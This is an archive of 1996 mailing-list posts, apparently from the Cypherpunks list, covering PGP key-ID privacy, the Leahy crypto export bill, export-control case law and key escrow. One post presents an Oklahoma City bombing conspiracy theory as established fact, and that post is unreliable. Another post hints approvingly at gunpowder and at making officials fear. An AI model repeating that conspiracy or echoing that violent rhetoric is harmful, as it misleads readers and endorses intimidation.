tjWzU1qbUptkJn8LBZPzFXGsXuHh6cF/W1Zk1q+81KURRkH0glYI2u0HY740YF7J
dxidEBZRQKc=
=8F6m
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Thu, 14 Mar 1996 17:07:12 +0800
To: Cypherpunks <cypherpunks@toad.com>
Subject: AMEX and Netscape
Message-ID: <Pine.SUN.3.91.960312161651.788A-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain



American Express Platinum card holders might want to look at the bottom 
of their statement:

CARD USE ON THE INTERNET -- Cardmembers should only conduct transactions 
over the internet using broswer software that supports industry-standard 
encryption protocols, such as those offered by Netscape or CyberCash.  We 
anticipate that additional and improved encryption protocols for Card 
transactions will become available over the next 3-6 months.  American 
Express will keep you informed of new developments in this area.

(Any Gold or Green card holders have the same notice?)

---
My prefered and soon to be permanent e-mail address: unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Thu, 14 Mar 1996 05:52:58 +0800
To: cypherpunks@toad.com
Subject: Re: ADL_mil (militias and the USAF)
In-Reply-To: <199603122050.VAA21740@utopia.hacktic.nl>
Message-ID: <199603122142.QAA18797@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Thank you, but this has nothing to do with Cypherpunks, and it isn't
appreciated. Had you been polite enough to include a return address I
would have replied privately, but unfortunately there is no way to do
that.

Anonymous writes:
> 
> <html><title>ADL Report</title><body>
> "The Anti-Defamation League has committed defamation.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Thu, 14 Mar 1996 12:11:54 +0800
To: cypherpunks@toad.com
Subject: Re: PGP reveals the key ID of the recipient of encrypted msg
Message-ID: <199603130447.UAA07749@ix3.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


>On Mon, 11 Mar 1996 savron@world-net.sct.fr wrote:
>> I began testing PGP  a few days ago ( I'm a PGP newbie ) and I found 
>> that it gives out the key ID of an encrypted message . From this you 
>> can get the  identification of the recipient of the message , if it's 
>> someone who has publicaly  distributed his  key (keyserver , homepage 
>> ...) . So even if you are unable to decode the message you  can find 
>> who is the recipient of a given message . I think this is a big 
>> privacy problem .

How much of a problem it is depends on the application you're using PGP for,
but yes, it's a concern.  There's a program called "stealth" by "Harry Hastur"
which lets you remove or hide this information, as well as hiding most of
the PGP headers.  (There are some aspects of PGP file structure that are
difficult to hide, at least without doing almost as much work as PGP
was already doing, and I don't know if it adjusts for the mathematical
properties of RSA-encrypted data which make it possible to identify the
public key over some number of messages.)

When the new PGP 3.0 comes out, there will be some support for
shorter keyIDs (which isn't perfect, but for instance a 4-bit keyID
would let you not try to decrypt 15/16ths of the messages,
while not really fingering you as the recipient.)

Also, if you have someone you frequently correspond with on some topic
(perhaps a mailing list) and want to be able to send them messages that
don't identify them, have them generate a public key they use just for 
that application.  You can send your request by anonymous remailer,
and they can send you a reply by anonymous remailer or post to
alt.anonymous.messages.  This still permits traffic analysis 
(nobody knows who keyid 0x12345678 is, but they know you sent him
ten messages in the last month.)

>> The problem is carried along when you encrypt a message for multiple  
>> recipients , you get the key IDs of all the recipients and same 
>> problem as above .  I think something like 'blind email copy' should 
>> be used , because the recipients don't have to know the identity of 
>> each other .
markm@voicenet.com  replied:
>You could just encrypt a message to different key ID's seperately, rather than
>in one pass of PGP.  The would have the effect of Bcc.

Yep.  That was the original PGP approach (i.e. "do nothing special"), and
multiple-recipients were added as an efficiency measure.
#--
#			Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com, +1-415-442-2215 pager 408-787-1281
# "At year's end, however, new government limits on Internet access threatened
# to halt the growth of Internet use.  [...] Government control of news media 
# generally continues to depend on self-censorship to regulate political and
# social content, but the authorities also consistently penalize those who
# exceed the permissable."  - US government statement on China...





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Thu, 14 Mar 1996 05:54:06 +0800
To: jimbell@pacifier.com
Subject: Re: How's that again?
Message-ID: <Pine.SUN.3.91.960312225120.27882A-100000@crl4.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

Jim and interested C'punks,

In response to a Jim Bell post I wrote:

> >Hey, Jim, don't forget me.  You are the only person I have ever
> >specifically UNinvited to one of my parties in over a decade of
> >hosting same.  I guess that makes you special.

To which Jim replied:
 
> You're confused.  You're describe YOUR reaction to ME, not MY reaction to 
> YOU.  And I am unaware of being invited to a "party," and now that I've 
> discovered what a sleazy person Alan Olsen and his merry band are, it is 
> really doubtful that I would have enjoyed what was advertised as a 
> cypherpunks meeting, but which you now claim was a "party."  Your level of 
> "honesty" is showing.

A)  It is you who is confused (see below)

B)  I'm not Alan Olsen (nor a member of his merry band, so I have
    no idea what you are talking about.

C)  There was a Cypherpunk meeting followed by a party.  The
    pictures are on the Web.

D)  It is your level of honesty that is showing.  As can be seen
    from the two messages (below) I sent you at the time.  They
    quote you in pertinent part.

>From sandfort@crl10.crl.comTue Mar 12 19:04:00 1996
Date: Sat, 20 Jan 1996 22:59:47 -0800 (PST)
From: Sandy Sandfort <sandfort@crl10.crl.com>
To: jim bell <jimbell@pacifier.com>
Subject: Re: PARTY-PARTY-PARTY

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

Jim,

You wrote:

> Putting the nearest city in the note would have been helpful.

Did you try looking at the actual invitation?


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

>From sandfort@crl12.crl.comTue Mar 12 19:04:17 1996
Date: Sun, 21 Jan 1996 08:24:26 -0800 (PST)
From: Sandy Sandfort <sandfort@crl12.crl.com>
To: jim bell <jimbell@pacifier.com>
Subject: Re: PARTY-PARTY-PARTY

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

Jim,

You moaned:

> I didn't feel inclined to waste 2-3 minutes of my time cranking
> up Netscape, and looking at a homepage or whereever the actual
> information was. 
> 
> I consider such behavior exceedingly rude.

I feel your pain.  Invitation withdrawn; problem solved.


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

NOW do you remember?


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anon-remailer@utopia.hacktic.nl (Anonymous)
Date: Thu, 14 Mar 1996 17:11:41 +0800
To: cypherpunks@toad.com
Subject: To IEEE: Don't Support Leahy Crypto Bill
Message-ID: <199603122236.XAA27019@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain



(To: medialink-list@WELL.com, cypherpunks@toad.com, action@eff.org,
     hal@hal.hpl.hp.com, farber@central.cis.upenn.edu,
     junger@pdj2-ra.F-REMOTE.cwru.edu)


12 March 1996

Before IEEE decides to "applaud" Leahy's bill publicly, I hope that
the organization carefully considers the bill's shortcomings. In
particular it might want to consider the critique written by Peter
Junger <junger@pdj2-ra.F-REMOTE.cwru.edu> of Case Western University
Law School. Junger writes that with Leahy's legislation:

   "The major threat is that, for the first time, there would be at
   least colorable Congressional authority for the requirement that
   one obtain a license before publishing or otherwise disclosing
   information. And software is, after all, nothing but information."

I urge the IEEE to rethink its position. At the very least, please
consider supporting Rep. Goodlatte's bill which includes a more
explicit prohibition on the executive branch mandating key escrow. It
is important that we back that bill before it goes to conference,
since we can have little impact on it thereafter.

Please redistribute this letter as appropriate.

Warmly,

Philomela



=-==-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
             DRAFT -- Do NOT Redistribute!
         IEEE Applauds Leahy Encryption Bill
=-==-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

DRAFT March 12, 1996

The Committee on Communications and Information Policy of the
Institute of Electrical and Electronics Engineers, United States
Activities applauds the proposed Encrypted Communications Privacy Act.
This legislation, introduced by Senators Pat Leahy (D-VT), Patricia
Murray (D-WA) and Conrad Burns (R-MT), will remove unnecessarily
restrictive controls on the export of encryption technology.

Current restrictions on the export of encryption technology harm the
interests of the United States in three ways: they handicap American
producers of software and hardware, prevent the development of a
secure information infrastructure, and limit the ability of
electronically active Americans to maintain their privacy. The
proposed legislation addresses all of these issues, while maintaining
prohibition on the use of cryptography to hide criminal activities.

Technological progress has moved encryption from the realm of national
security into private sphere. Current policies, as well as the
policy-making processes, should reflect this new reality. We applaud
recent changes in information policy which mitigate the severity of
controls on encryption technologies. With the additional changes
sought by Senators Leahy, Murray and Burns, the United States can
maintain its historical leadership in cryptography. Without the
handicap of limitations on their ability to export secure systems,
American software and hardware producers have the potential to excel
in the global market for secure products.

The removal of unnecessary restrictions on exports will also enable
the creation of a Global Information Infrastructure sufficiently
secure to provide seamless connectivity to customers previously
unreachable by American companies. The United States is a leader in
Internet commerce. However, Internet commerce requires cryptography.
Thus American systems have been hindered by cold-war restraints on the
necessary cryptography as these systems have moved from the laboratory
to the marketplace.

This legislation would open the market to secure, private, ubiquitous
electronic commerce. The cost of not opening the market to secure
American Internet products may include the loss of decades of
leadership in Internet technologies, just as the Internet is entering
its most profitable period.

Finally, Sen. Leahy, Murray and Burns would be serving all users of
electronic information systems in creating a truly global market for
secure desktop environments. Having secure and private electronic
spaces is of particular interest to the Institute of Electrical and
Electronics Engineers, United States Activities and its members.

The Committee on Communications and Information Policy of the
Institute of Electrical and Electronics Engineers, United States
Activities applauds Senators Pat Leahy (D-VT), Patricia Murray (D-WA)
and Conrad Burns (R-MT) for their foresight and supports the proposed
legislation to liberalize controls on cryptography.

Sincerely,

[Signed]

Visit http://www.ieee.org/ for more information.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Thu, 14 Mar 1996 11:07:45 +0800
To: Black Unicorn <unicorn@schloss.li>
Subject: Re: How's that again?
Message-ID: <199603130737.XAA22798@ix15.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 05:40 PM 3/12/96 -0500, Black Unicorn wrote:
>Revise your statement to:
>"doesn't want anyone who hasn't spent a few years in law school to pass 
>judgement on pending legislation and the effect of supreme court decision 
>thereon..."
>and you'd be right on the money.

I'm not a lawyer, though I've played a politician on TV.  I'll grant you
that lawyers and other trained legal professionals can do a far better
job of finding and analyzing cases than amateurs like myself, though I suspect
a month or two's experience with Lexis would be enough to let many 
of "the rest of us" outsearch the average lawyer of 50 years ago
who had to rely on his or her wits alone.  But if the average intellegent
person _can't_ evaluate a law and have a reasonable chance of figuring
out what it says and what it means, there's something seriously wrong
with the way new laws are written, as well as enforced.

(I suppose I've complained enough that there _is_ something
seriously wrong them that I'm not adding any new weight here;
if the author of a portion of a law can get up on the Senate floor
and say that he realizes that part of the law he's proposed is
unconstitutional and unenforceable, and that this doesn't bother him*,
I guess it's no surprise that one of the more-or-less "good guys"
in the Senate can propose a law so ambiguously worded that it
looks good on the face until a good lawyer takes the time to rip
it apart - maybe Leahy will read some of Junger's review?)

> And I confirm again that I'm an elitist legal snob.
> At least I know what I'm talking about.


[* Is it true that the reason Election Day is on the _second_
Tuesday of November is to guarantee it never falls on Guy Fawkes' Day?]
#--
#			Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com, +1-415-442-2215 pager 408-787-1281
# "At year's end, however, new government limits on Internet access threatened
# to halt the growth of Internet use.  [...] Government control of news media 
# generally continues to depend on self-censorship to regulate political and
# social content, but the authorities also consistently penalize those who
# exceed the permissable."  - US government statement on China...





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Deranged Mutant" <WlkngOwl@UNiX.asb.com>
Date: Thu, 14 Mar 1996 12:09:05 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Why escrow? (was Re: How would Leahy bill affect crypto over HAM
Message-ID: <199603130646.BAA03568@UNiX.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


jim bell <jimbell@pacifier.com>
> Well, okay, but we've really got to define whose key is being escrowed, 
> anyway.  Most corporations will probably handle it themselves, OR they will 
> only give an ENCRYPTED escrowed key to the escrow agent.  This would prevent 
[..]
They may use secret sharing or splitting methods and handle parts by 
different organizations within themselves and hand other parts to an 
outside agent.  Sometimes this makes sense when there are political 
rivalries within an organization.  They want the ability to get into 
Dilbert's files if he drops dead, but they want an objective party to 
hold part of the key so his rivals don't try to steal his files.

 
Rob. 

---
Send a blank message with the subject "send pgp-key" (not in
quotes) to <WlkngOwl@unix.asb.com> for a copy of my PGP key.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jamesd@echeque.com
Date: Thu, 14 Mar 1996 19:31:46 -0500
To: Bill Stewart <unicorn@schloss.li>
Subject: Re: How's that again?
Message-ID: <199603131614.IAA03491@dns1.noc.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 11:37 PM 3/12/96 -0800, Bill Stewart wrote:
> I guess it's no surprise that one of the more-or-less "good guys"
> in the Senate can propose a law so ambiguously worded that it
> looks good on the face until a good lawyer takes the time to rip
> it apart

Looking for "good guys" in Washington is like Ronald Reagan looking 
for "moderates" in Iran.  On crypto, and on taxes, our interests 
and their their interests are completely opposed.  We should not 
care about, or take any interest in, the slight difference between 
the "moderate" and extremist members of the Senate and the House 
of Representatives.


The best bill we can ever hope to get out of Washington is no
bill at all.
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tj_lists@prado.com
Date: Fri, 15 Mar 1996 13:59:18 +0800
To: John Young <jya@pipeline.com>
Subject: Re: ADL_mil
Message-ID: <199603131451.GAA16213@zoe.prado.com>
MIME-Version: 1.0
Content-Type: text/plain


Addressed to: John Young <jya@pipeline.com>
              <cypherpunks@toad.com>

** Reply to note from John Young <jya@pipeline.com> 03/10/96  5:15pm -0500

> The ADL survey also found that many hard-core 
>       militiamen believe that the United States Government 
>       itself conducted the Oklahoma City bombing to create an 
>       excuse for further depriving citizens of their 
>       constitutional rights.

One doesn't need to be a "hard-core militia" type to realize the demolition
of the Murrah Bldg. wasn't caused by a truck full of ANFO 20 feet away. The
alleged method used, 20 seperate plastic drums of the stuff is the absolutely
WRONG way to get a coherent explosion of ANFO which needs concentration, not  
air space between the containers. Further more, a truck bomb would create a
circular blast pattern, not the linear left to right pattern seen & caused by  
shape charges planted on the structural columns inside the building.

Brig. General USAF (Ret.) Ben Partin, who designed & tested bombs while in  
the Air Force wrote in a letter to various Congressmen, "I can say, with a  
high level of confidence, that the damage pattern on the reinforced concrete  
superstructure could not possibly have been attained from the single truck  
bomb without supplementing demolition charges at some of the reinforced  
column bases. The total incompatibility with a single truck bomb lies in the  
fact that either some of the columns collapsed that should not have collapsed  
or some of the columns are still standing that should have collapsed and did  
not."

According to Charles Mankin, head of the Geologic Survey at the University of  
Oklahoma, referring to seismograph records of April 19, 1995 "We had two  
events, ten seconds apart. The first one coincided in time with the explosion  
at the Federal Building." 

A truck bomb did explode outside of the Fed Bldg as a cover & distraction for  
the real demolition job inside. McVeigh is a dupe, a fall guy, about on par  
with Lee H. Oswald in Dallas, November 23, 1963. The benefits to the statist  
monstrosity & it's quasi-official allies like the ADL of the deaths of 168  
people have been enormous. This in itself does not prove government agencies  
are responsible for the bombing, but combined with the simple fact that the  
damage could not possibly have occured the way they are claiming it did, it  
adds up to certainty as to whom the real bombers are. Qui bono? 







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: matthew@itconsult.co.uk (Matthew Richardson)
Date: Thu, 14 Mar 1996 05:48:22 +0800
To: cypherpunks@toad.com
Subject: Re: PGP reveals  the key ID of the recipient of encrypted msg
In-Reply-To: <v02140b06ad6bb73beb5c@[165.254.158.237]>
Message-ID: <3146910b.90015235@itconsult.co.uk>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 13 Mar 1996 00:28:48 -0500, "Robert A. Rosenberg"
<hal9001@panix.com> wrote:

>There is also the problem of knowing WHICH key to use (ie: Even when you
>know the message is intended for you, you must do a test run with each of
>your keys until one works).

I believe that provided all your keys are in your secret keyring, PGP
will automatically pick the correct one for you.

Best wishes,
Matthew




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Thu, 14 Mar 1996 09:21:54 +0800
To: Bill Stewart <unicorn@schloss.li>
Subject: Re: How's that again?
Message-ID: <m0twu6i-000932C@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:37 PM 3/12/96 -0800, Bill Stewart wrote:
>At 05:40 PM 3/12/96 -0500, Black Unicorn wrote:
>>Revise your statement to:
>>"doesn't want anyone who hasn't spent a few years in law school to pass 
>>judgement on pending legislation and the effect of supreme court decision 
>>thereon..."
>>and you'd be right on the money.
>
>I'm not a lawyer, though I've played a politician on TV.  I'll grant you
>that lawyers and other trained legal professionals can do a far better
>job of finding and analyzing cases than amateurs like myself, though I suspect
>a month or two's experience with Lexis would be enough to let many 
>of "the rest of us" outsearch the average lawyer of 50 years ago
>who had to rely on his or her wits alone.  But if the average intellegent
>person _can't_ evaluate a law and have a reasonable chance of figuring
>out what it says and what it means, there's something seriously wrong
>with the way new laws are written, as well as enforced.

Well said.  If more people lambasted this "Black Unicorn" fellow for his 
legal-elitist ways, he'd actually be forced to either shut up or use 
reasoned argument to support his odd position.

Laws, as I understand it, used to be written so that ordinary people could 
understand them.  That's the way it ought to be today, but isn't, precisely 
because the elitists have had their way for so long.  There used to be a 
saying, "Ignorance of the law is no excuse."  The presumption was that you 
had a responsibility to know what the law said, and that most people could 
understand what it said, and if you didn't take the time to know it you were 
guilty despite this.  Today, that saying is laughably out of date:  When 
people like "Black Unicorn" claim that ordinary people haven't the skills to 
evaluate any law or proposed law, it is obvious that he and his ilk is a 
major portion of the problem. 


>(I suppose I've complained enough that there _is_ something
>seriously wrong them that I'm not adding any new weight here;
>if the author of a portion of a law can get up on the Senate floor
>and say that he realizes that part of the law he's proposed is
>unconstitutional and unenforceable, and that this doesn't bother him*,
>I guess it's no surprise that one of the more-or-less "good guys"
>in the Senate can propose a law so ambiguously worded that it
>looks good on the face until a good lawyer takes the time to rip
>it apart - maybe Leahy will read some of Junger's review?)

The system is sick, perhaps irretrievably so.  Dr. Strangelove (in the movie 
of the same name) stated that "deterrence is the art of making the enemy 
FEAR to attack."  I think the main problem (and the most direct solution) to 
the "politician-problem" in this country is to make government agents FEAR 
to do the wrong thing.


>> And I confirm again that I'm an elitist legal snob.
>> At least I know what I'm talking about.
>
>[* Is it true that the reason Election Day is on the _second_
>Tuesday of November is to guarantee it never falls on Guy Fawkes' Day?]

It's going to take a lot more than gunpowder to solve this problem.  
Although that would be a good start...

Jim Bell
jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter D. Junger" <junger@pdj2-ra.F-REMOTE.CWRU.Edu>
Date: Thu, 14 Mar 1996 08:50:12 -0500
To: Cypherpunks <cypherpunks@toad.com>
Subject: Re: Crypto Exposure
In-Reply-To: <199603130737.XAA22803@ix15.ix.netcom.com>
Message-ID: <m0twrOM-0004KkC@pdj2-ra.F-REMOTE.CWRU.Edu>
MIME-Version: 1.0
Content-Type: text/plain


Bill Stewart writes:

: >- What if the foreigner actually write crypto code while in
: >the US?  Does he (or the Uni/ISP) violate export restrictions each 
: >time he access the source code or execute his program if they are 
: >stored on a public (Uni/ISP) machine? 
: 
: The foreigner isn't a US person, so he doesn't violate the
: law by reading the code himself.  If the Uni or ISP knows
: that it's providing encryption software to the foreigner,
: it may be liable, but without scienter it's tough to have guilt.
: Probably the foreigner should not keep encryption software on
: University or ISP machines - floppy disks should do just fine :-)

If the foreigner doesn't have a green card he is a foreign person and
allowing himself to read his own code would be disclosing that code to
a foreign person and that is a felony unless he first gets a license
which he can't get because he is a foreign person or a favorable
commodity jurisdiction determination which he can't get without first
reading his code and sending a copy of it to the Office of Defense
Trade Controls.

--
Peter D. Junger--Case Western Reserve University Law School--Cleveland, OH
Internet:  junger@pdj2-ra.f-remote.cwru.edu    junger@samsara.law.cwru.edu




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Pettitt <jpp@software.net>
Date: Thu, 14 Mar 1996 09:30:21 +0800
To: "Robert A. Rosenberg" <hal9001@panix.com>
Subject: Re: PGP reveals  the key ID of the recipient of encrypted msg
Message-ID: <2.2.32.19960313172644.012b0ff4@mail.software.net>
MIME-Version: 1.0
Content-Type: text/plain


At 12:28 AM 3/13/96 -0500, Robert A. Rosenberg wrote:

>                  So long as you have your corespondent's published Public
>Key, you can use it to do a one-time transmission of a private Public Key
>to be used to do anonymous (ie: Not Linked to your Public Identity)
>transmissions to you.
>
>
>

Yes but even a non pub keyid leaks information usefull for traffic analysis.
John Pettitt, jpp@software.net
VP Engineering, CyberSource Corporation, 415 473 3065
 "Technology is a way of organizing the universe so that man
  doesn't have to experience it." - Max Frisch

PGP Key available at:
http://www-swiss.ai.mit.edu/htbin/pks-extract-key.pl?op=get&search=0xB7AA3705





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Thu, 14 Mar 1996 09:56:50 +0800
To: junger@pdj2-ra.F-REMOTE.CWRU.Edu
Subject: Re:  A lengthy preliminary analysis of the Leahy bill.
Message-ID: <199603131739.JAA01998@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


From: "Peter D. Junger" <junger@pdj2-ra.F-REMOTE.CWRU.Edu>
> From the point of view of one who is concerned with first amendment
> rights rather than selling cryptographic software as a commodity, the
> really unfortunate part is that this provision authorizes export
> contols on ``software''.  Now the Leahy bill does not define software,
> but there is a definition of lying around in the International Traffic
> in Arms Regulations (``ITAR'') that I fear Commerce might adopt---it
> may even be the language that the draftsmen of the Leahy bill had in
> mind.  And this definition of ``software'' includes a great deal of
> material that cannot constitutionally be controlled.  Here is that
> definition from the ITAR \S 121,8(f): ``Software includes but is not
> limited to the system functional design, logic flow, algorithms,
> application programs, operating systems and support software for
> design, implementation, test, operation, diagnosis and repair.''
> [...]
> Even if that definition is adopted, the fact remains that software is
> still nothing but information, and that it is the communication of
> information that is protectected by the first amendment to the United
> States constitution.  (If you aren't convinced that software is
> protected by the first amendment, notice that software is
> copyrightable as a ``literary work''.)  Note that the paradigmatic
> violation of the first amendment is a scheme under which the
> government requires publishers to obtain a license before publishing.

Are you familiar with the Posey case?  That decision by the 9th district
court (which oversees export cases) explicitly rejected the contention
that restrictions on export of written materials violate the First
Amendment.  Although I am not a lawyer, I wrote some notes on this case at:
<URL: http://www.portal.com/~hfinney/cryp_export2.html>.

Below is an excerpt from that court decision in which they make it quite
clear that the First Amendment doesn't apply.  In this case, the item
being exported was a technical manual obtained from the US government
itself under the Freedom of Information Act.  Surely this is even closer
to what the framers of the constitution had in mind when they conceived
of the First Amendment, yet the constitutionality of restrictions on its
export has been upheld.  So you should be aware that the status quo is
that the restrictions you fear being legitimized by the Leahy bill are
already in place.

Here is part of the Posey decision [864 F2d 1487] (the AECA is the Arms
Export Control Act, which is what currently forbids the export of
encryption devices, and the CAAA is the Comprehensive Anti-Apartheid Act,
which applied specifically to South Africa, where the materials in this
case were sent):

    VII. FIRST AMENDMENT

    Appellant's final argument is that the First Amendment bars the
    government from restricting the export of information that is already
    available to the public.  He insists that the data he sent abroad
    was available under the Freedom of Information Act, and therefore
    could be legally obtained by virtually everyone in the world.  He contends
    that the First Amendment prohibits the application of the AECA and
    CAAA to the export of such publicly available information.

    Our Court has already considered and rejected this argument.  In
    United States v. Edler Industries, 579 F2d 516 (9th Cir. 1978), we
    rejected an essentially identical challenge to the predecessor of the
    AECA.  The defendant was convicted of exporting certain manufacturing
    designs that were on the Munitions List but were not classified.  He
    challenged his conviction on First Amendment grounds, arguing that the
    government could not constitutionally prohibit the export of techno-
    logical data that was widely distributed within the United States.  In
    rejecting that claim, we explained that even assuming that the First
    Amendment offers some protection to the dissemination of technical data,
    the government has a strong interest in regulating the export of
    military information:

      The federal government undeniably possesses the power to regulate the
      international arms traffic....  As a necessary incident to the power
      to control arms export, the President is empowered to control the
      flow of information concerning the production and use of arms.  The
      authority to regulate arms traffic would be of negligible practical
      value if it encompassed only the exportation of particular military
      equipment but not the exportation of blueprints specifying the
      construction of the very same equipment.
    
    579 F2d at 520.  We accordingly concluded that the government could
    permissibly restrict the flow abroad of data included in the Munitions
    List.  579 F2d at 521.  Finally, we held that the government's power
    to issue such restrictions was not affected by the domestic availability
    of the regulated data:

      Given the unquestionable legitimacy of the national interest in
      restricting the dissemination of military information, the claim of
      public availability in the United States is not a defense recognized
      by the Constitution.
    
    579 F2d at 522.

    Appellant attempts to distinguish Edler from the present case by pointing
    out that the exported data in Edler was "cutting edge" technology and
    was not widely used in this country.  [Citation].  Whether or
    not this was factually true of the technology at issue in Edler, however,
    the Edler decision clearly assumed for purposes of its decision that
    the material was extensively available in the United States.  See 579
    F2d at 518, 522.

    Moreover, we believe Edler should not be read as permitting the govern-
    ment to restrict the export of only that information which is not
    widely available domestically.  Under appellant's reading of Edler,
    if the government wished to prevent technical data from being sent to
    foreign powers, it would be required to suppress the information alto-
    gether, at home as well as abroad.  This outcome would blur the fact
    that national security concerns may be more sharply implicated by the
    export abroad of military data than by the domestic disclosure of such
    data.  Technical data that is relatively harmless and even socially val-
    uable when available domestically may, when sent abroad, pose unique
    threats to national security.  It would hardly serve First Amendment
    values to compel the government to purge the public libraries of every
    scrap of data whose export abroad it deemed for security reasons
    necessary to prohibit.  We conclude that appellant's conviction does
    not violate the First Amendment.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Thu, 14 Mar 1996 07:17:03 +0800
To: "Deranged Mutant" <WlkngOwl@UNiX.asb.com>
Subject: Re: Why escrow? (was Re: How would Leahy bill affect crypto over HAM
Message-ID: <m0twuXn-00092BC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 01:39 AM 3/13/96 +0000, Deranged Mutant wrote:

>They may use secret sharing or splitting methods and handle parts by 
>different organizations within themselves and hand other parts to an 
>outside agent.  Sometimes this makes sense when there are political 
>rivalries within an organization.  They want the ability to get into 
>Dilbert's files if he drops dead, but they want an objective party to 
>hold part of the key so his rivals don't try to steal his files.

Notice, however, how the government seems to be assuming that "key escrow" 
(to the extent that it is implemented at all!) gets implemented in a way 
which is "friendly" to government agents.  They assume that there is one key 
that is available at one location, one that is well-marked and identified, 
unencrypted, and is available for pickup 24 hours per day assuming they 
present the proper credentials or court order.

Even the most limited planning could easily develop a system that achieves 
all the benefits of escrow for the user, but is essentially impossible for 
government agents (or for that matter, anyone else!) to use to the detriment 
of the user.  





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Thu, 14 Mar 1996 11:37:54 +0800
To: jimbell@pacifier.com (jim bell)
Subject: Re: How's that again?
In-Reply-To: <m0twag5-0008xXC@pacifier.com>
Message-ID: <199603131503.KAA10011@homeport.org>
MIME-Version: 1.0
Content-Type: text


jim bell wrote:

| I think this is an exaggeration...  I"ve been told that this list goes to 
| over a thousand addresses.  Weighted only among those who choose to post (a 
| self-selected group, obviously), I do raise some heat, but it isn't clear 
| that "most" or even a large minority of the list disagree with my 

	I disagree with your thoughts, and find you annoying and
unwilling to answer substantitive questions raised about your plans.
Furthermore, most of your posts are way too long.

Adam


-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Derek Atkins <warlord@MIT.EDU>
Date: Thu, 14 Mar 1996 08:48:30 -0500
To: matthew@itconsult.co.uk (Matthew Richardson)
Subject: Re: PGP reveals the key ID of the recipient of encrypted msg
In-Reply-To: <3146910b.90015235@itconsult.co.uk>
Message-ID: <199603131602.LAA29467@toxicwaste.media.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


> I believe that provided all your keys are in your secret keyring, PGP
> will automatically pick the correct one for you.

Unfortunately, PGP 2.6.2 will do this only if the PGP message has
proper keyIDs.  It finds the proper key by matching the keyID in the
PGP message to the keyIDs in the secret keyring.  If you remove the
keyIDs from the message (as stealth does), PGP 2.6.2 cannot find the
secret key to use.

One fix would be to have PGP (say, PGP3 ;) try all the keys on your
secret keyring if the keyID in the message is 0.  In other words, you
can pseudo-stealth a message by leaving off the keyID and PGP3 would
attempt all the secret keys.  If one worked, you'd be able to read it.
